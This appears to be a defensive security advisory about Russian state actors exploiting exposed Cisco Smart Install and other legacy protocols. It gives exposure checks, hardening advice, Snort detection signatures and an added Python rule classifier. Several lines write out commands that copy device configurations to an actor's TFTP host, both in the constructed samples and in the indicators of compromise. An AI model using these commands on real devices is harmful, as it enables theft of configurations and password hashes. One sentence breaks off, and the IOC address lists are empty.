Russian state actors have carried out attacks on Western targets for years. The British NCSC and US DHS have now specifically called out Russia in a warning about a wave of attacks going back to at least 2016. With these attacks, Russian state actors have attempted to compromise network devices on a large scale. The sectors primarily targeted by these attacks are government and private-sector organizations, critical infrastructure providers, and the Internet service providers (ISPs) supporting these sectors.
Using legacy protocols and outdated software on network devices, the attackers fingerprint vulnerable devices and exploit weaknesses to gain access.
The attackers search for network devices (firewalls, switches and routers) that expose outdated, insecure or unauthenticated protocols to the internet. They then use the reachable protocols to gain access to the device and, from there, possibly a foothold in the connected network.
Some examples of protocols/services that were leveraged to gain access are:
- Telnet (port 23)
- HTTP (port 80)
- SNMP (port 161/162)
- Cisco Smart Install (port 4786)
The Cisco Smart Install protocol (SMI) is of particular interest because it can be abused to retrieve the configuration of certain Cisco network devices, something that is normally only possible for an attacker who is already inside the network. Whenever an SMI-supported network device is externally reachable, an attacker could send a spoofed SNMP packet to trick the device into sending its configuration.
Such a configuration contains information about the device and its connected network, including password hashes. Based on the configuration it is possible to map the network infrastructure and identify potentially interesting targets. The gathered information and password hashes are then used to gain remote access to servers.
Because SMI is an unauthenticated protocol, an attacker is able to configure or edit any SMI-supported network device and deploy a backdoored version of its operating system. With the right changes an attacker is able to perform a man-in-the-middle attack and steal data.
Based on the Shodan results from today, about 150,000 SMI-supported devices are externally reachable.
The top five countries with the highest number of externally reachable SMI-supported devices:
- United States (42,167)
- Russian Federation (10,984)
- Japan (9,064)
- China (8,796)
- Republic of Korea (7,467)
Am I vulnerable?
You will be vulnerable to attacks using this MO if your organization has devices connected to the internet with unauthenticated or otherwise open and reachable ports. In other words, this is an issue that everyone should be aware of. Even if state actors are not a relevant threat to your organisation, there are other actors that use this same MO.
To find out specifically whether you have an externally reachable Cisco Smart Install-supported device in your network, you can use the following Shodan search queries:
Cisco Smart Install Client active ip:"<IP>"
Cisco Smart Install Client active net:"<SUBNET>"
Here IP is the external IP address you use (not an RFC 1918 address); if you have more than one IP, separate them with a comma.
Cisco Smart Install Client active ip:"220.127.116.11, 18.104.22.168"
Cisco Smart Install Client active net:"22.214.171.124/24"
Or you can use Nmap (Network Mapper) with the following parameters:
nmap -p 4786 -v <IP>
If the response banner contains “Cisco Smart Install Client active” the network
Fox-IT advises the following:
- For any network connected device, especially those connected to the internet directly, make sure that you understand which ports are open, and who needs access to those. Reduce your attack surface either by closing ports or restricting access through use of (multi-factor) authentication and/or other methods of access control, such as access control lists.
- Do not allow unencrypted connections for external network management changes. Use SSH, HTTPS/TLS or encrypted VPN connections for network management instead.
- Limit or disable the use of outdated and insecure protocols such as Telnet, SNMPv1 and SNMPv2.
- Apply a strong password policy, with a unique password for every device.
Fox-IT has created the following additional signatures to detect the use of the Smart Install Exploitation Tool. These signatures detect the scanning activity of the tool.
alert tcp $EXTERNAL_NET any -> $HOME_NET 4786 (msg:"FOX-SRT - IOC - SmartInstallExploitationTool GetConfig Command"; content:"copy system:running-config"; fast_pattern; content:"config.text tftp://"; classtype:attempted-admin; reference:<blog>; priority:1; sid:1; rev:1;)
alert tcp $EXTERNAL_NET any -> $HOME_NET 4786 (msg:"FOX-SRT - IOC - SmartInstallExploitationTool Execute Command"; content:"execute.txt"; fast_pattern; content:"tftp://"; classtype:attempted-admin; reference:<blog-url>; priority:1; sid:1; rev:1;)
alert tcp $EXTERNAL_NET any -> $HOME_NET 4786 (msg:"FOX-SRT - IOC - SmartInstallExploitationTool Upload Config Command"; content:".conf"; fast_pattern; content:"tftp://"; classtype:attempted-admin; reference:<blog-url>; priority:1; sid:1; rev:1;)
US-CERT and NCSC UK have also published signatures based on the use of the Smart Install Exploitation Tool.
alert tcp any any -> any 4786 (msg:"SmartInstallExploitationTool_UpdateIos_And_Execute"; flow:established; content:"|00 00 00 01 00 00 00 01 00 00 00 02 00 00 01 c4|"; offset:0; depth:16; fast_pattern; content:"://";)
alert tcp any any -> any 4786 (msg:"SmartInstallExploitationTool_ChangeConfig"; flow:established; content:"|00 00 00 01 00 00 00 01 00 00 00 03 00 00 01 28|"; offset:0; depth:16; fast_pattern; content:"://";)
alert tcp any any -> any 4786 (msg:"SmartInstallExploitationTool_GetConfig"; flow:established; content:"|00 00 00 01 00 00 00 01 00 00 00 08 00 00 04 08|"; offset:0; depth:16; fast_pattern; content:"copy|20|";)
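To see what the Fox-IT and US-CERT/NCSC rules above actually key on, here is an added example (not code from Fox-IT, US-CERT or the tool) that re-implements both rule sets as a small Python classifier for triaging captured TCP/4786 payloads offline. The sample payloads are constructed from the header bytes and command strings quoted in the rules; 192.0.2.10 is a documentation address standing in for the actor host.

```python
# Added example, not from the Fox-IT post: mirrors the Snort rules above so
# captured TCP/4786 payloads can be triaged offline. All samples are constructed.

# 16-byte header prefixes from the US-CERT/NCSC rules (offset:0; depth:16),
# each paired with the extra content the same rule also requires.
SMI_HEADER_RULES = {
    bytes.fromhex("000000010000000100000002000001c4"): ("UpdateIos_And_Execute", b"://"),
    bytes.fromhex("00000001000000010000000300000128"): ("ChangeConfig", b"://"),
    bytes.fromhex("00000001000000010000000800000408"): ("GetConfig", b"copy "),
}

# Fox-IT rules: both content strings must appear anywhere in the payload
# (Snort content matches are unordered unless distance/within are given).
FOXIT_RULES = [
    ("GetConfig Command", (b"copy system:running-config", b"config.text tftp://")),
    ("Execute Command", (b"execute.txt", b"tftp://")),
    ("Upload Config Command", (b".conf", b"tftp://")),
]


def match_header_rules(payload: bytes) -> list:
    """Names of the header-keyed (US-CERT/NCSC) rules that fire on payload."""
    header = payload[:16]
    return ["SmartInstallExploitationTool_" + name
            for prefix, (name, needle) in SMI_HEADER_RULES.items()
            if header == prefix and needle in payload]


def match_foxit_rules(payload: bytes) -> list:
    """Names of the command-text (Fox-IT) rules that fire on payload."""
    return ["FOX-SRT - IOC - SmartInstallExploitationTool " + name
            for name, needles in FOXIT_RULES
            if all(n in payload for n in needles)]


def classify(payload: bytes) -> list:
    """All rule names that would fire on one TCP/4786 payload, sorted."""
    return sorted(set(match_header_rules(payload) + match_foxit_rules(payload)))


# Constructed samples: header bytes from the rules plus command text from
# the post. "nonmatch" uses a header value none of the rules list.
SAMPLES = {
    "getconfig": (bytes.fromhex("00000001000000010000000800000408") + b"\x00" * 8
                  + b"copy system:running-config flash:/config.text tftp://192.0.2.10/config.text"),
    "upload": bytes.fromhex("00000001000000010000000300000128") + b"tftp://192.0.2.10/new.conf",
    "ioc_copy": b"copy nvram:startup-config tftp://192.0.2.10/actor.conf",
    "nonmatch": bytes.fromhex("00000001000000010000000100000000") + b"unrelated",
}

if __name__ == "__main__":
    for label, payload in SAMPLES.items():
        print(f"{label:10s} -> {classify(payload) or ['no match']}")
```

Note that the `copy nvram:startup-config tftp://...conf` command listed under the indicators of compromise below fires only the Fox-IT "Upload Config Command" rule (via `.conf` and `tftp://`), not the GetConfig rules, so tune expectations accordingly when hunting.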
Indicators of Compromise
The initial scanning activity on the SMI port in June and July was performed from the following IP addresses:
These IPs started sending the following commands to copy the configuration files:
copy nvram:startup-config flash:/config.text
copy nvram:startup-config tftp://[actor address]/[actor filename].conf
The filename of the configuration file is currently unknown. So far only a single IP address is known to be used as the destination for the retrieved configuration: